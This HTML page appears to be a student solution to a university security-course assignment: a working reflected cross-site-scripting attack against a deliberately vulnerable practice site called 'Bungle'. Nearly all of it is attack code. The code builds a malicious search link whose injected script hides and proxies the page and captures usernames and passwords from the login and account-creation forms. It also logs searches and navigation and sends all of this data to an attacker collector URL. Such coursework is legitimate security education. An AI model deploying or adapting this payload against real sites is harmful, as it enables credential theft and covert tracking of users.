<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
	<script>
		// Extend this function:
		function payload(attacker) {
			function log(data) {
				console.log($.param(data));
				$.get(attacker, data);
			}
			
			function logInListener(event) {
				event.preventDefault();
				
				var message = new Object();
				message.event = "login";
				var user = document.getElementById("username").value;
				message.user = user;
				var pass = document.getElementById("userpass").value;
				message.pass = pass;
				log(message);
				
				$.ajax({
					type: "POST",
					data: {"username": user, "password": pass},
					url: "http://bungle-cs461.csl.illinois.edu/login?xssdefense=0"
				}).done(function (data) {
					proxy("./");
					window.history.pushState(null, "Bungle!",
						"http://bungle-cs461.csl.illinois.edu/");
				});
			}
			
			function createListener(event) {
				event.preventDefault();
				
				var message = new Object();
				message.event = "create";
				var user = document.getElementById("username").value;
				message.user = user;
				var pass = document.getElementById("userpass").value;
				message.pass = pass;
				log(message);
				
				$.ajax({
					type: "POST",
					data: {"username": user, "password": pass},
					url: "http://bungle-cs461.csl.illinois.edu/create?xssdefense=0"
				}).done(function (data) {
					proxy("./");
					window.history.pushState(null, "Bungle!",
						"http://bungle-cs461.csl.illinois.edu/");
				});
			}
			
			function logOutListener(event) {
				event.preventDefault();
				
				var message = new Object();
				message.event = "logout";
				message.user = document.getElementById("logged-in-user").innerHTML;
				log(message);
				
				$.ajax({
					type: "POST",
					url: "http://bungle-cs461.csl.illinois.edu/logout?xssdefense=0"
				}).done(function (data) {
					proxy("./");
					window.history.pushState(null, "Bungle!",
						"http://bungle-cs461.csl.illinois.edu/");
				});
			}
			
			function searchListener(event) {
				event.preventDefault();
				
				var message = new Object();
				message.event = "search";
				if (document.getElementById("logged-in-user"))
					message.user = document.getElementById("logged-in-user").innerHTML;
				var query = document.getElementById("query").value;
				message.query = query;
				log(message);
				
				var url = "./search?xssdefense=0&q=";
				url = url.concat(query);
				proxy(url);
				window.history.pushState(null, "Bungle!",
						"http://bungle-cs461.csl.illinois.edu/".concat(url));
			}
			
			function searchAgListener(event) {
				event.preventDefault();
				
				var message = new Object();
				message.event = "search again";
				if (document.getElementById("logged-in-user"))
					message.user = document.getElementById("logged-in-user").innerHTML;
				log(message);
				
				proxy("./");
				window.history.pushState(null, "Bungle!",
						"http://bungle-cs461.csl.illinois.edu/");
			}
			
			function bungleListener(event) {
				event.preventDefault();
				
				var message = new Object();
				message.event = "bungle";
				if (document.getElementById("logged-in-user"))
					message.user = document.getElementById("logged-in-user").innerHTML;
				log(message);
				
				proxy("./");
				window.history.pushState(null, "Bungle!",
						"http://bungle-cs461.csl.illinois.edu/");
			}
			
			function proxy(href) {
				$("html").load(href, function(res) {
					$("html").show();
					if (document.getElementById("logged-in-user")) {
						var user = document.getElementById("logged-in-user").innerHTML;
						log({"event": "nav", "user": user, "url": href});
					} else {
						log({"event": "nav", "url": href});
					}
					// Listeners
					if (document.getElementById("log-in-btn")) {
						document.getElementById("log-in-btn").onclick = logInListener;
					}
					
					if (document.getElementById("new-account-btn")) {
						document.getElementById("new-account-btn").onclick = createListener;
					}
					
					if (document.getElementById("log-out-btn")) {
						document.getElementById("log-out-btn").onclick = logOutListener;
					}
					
					if (document.getElementById("search-btn")) {
						document.getElementById("search-btn").onclick = searchListener;
					}
					
					if (document.getElementById("search-again-btn")) {
						document.getElementById("search-again-btn").onclick = searchAgListener;
					}
					
					if (document.getElementById("bungle-lnk")) {
						document.getElementById("bungle-lnk").onclick = bungleListener;
					}
					
					window.addEventListener("popstate", function(event) {
						proxy(window.location.href);
					});
				});
			}
			$("html").hide();
			proxy("./");
			window.history.replaceState(null, "Bungle!",
						"http://bungle-cs461.csl.illinois.edu/");
		}
		
		function makeLink(xssdefense, target, attacker) {
			if (xssdefense == 0) {
				return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
					encodeURIComponent("<script" + ">" + payload.toString() +
					";payload(\"" + attacker + "\");</script" + ">");
			} else {
				// Implement code to defeat XSS defenses here.
			}
		}
		
		var xssdefense = 0;
		var target = "http://bungle-cs461.csl.illinois.edu/";
		var attacker = "http://127.0.0.1:31337/stolen";
		
		$(function() {
			var url = makeLink(xssdefense, target, attacker);
			console.log(url);
			$("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
		});
	</script>
</head>

<body>
	<h3></h3>
</body>

</html>
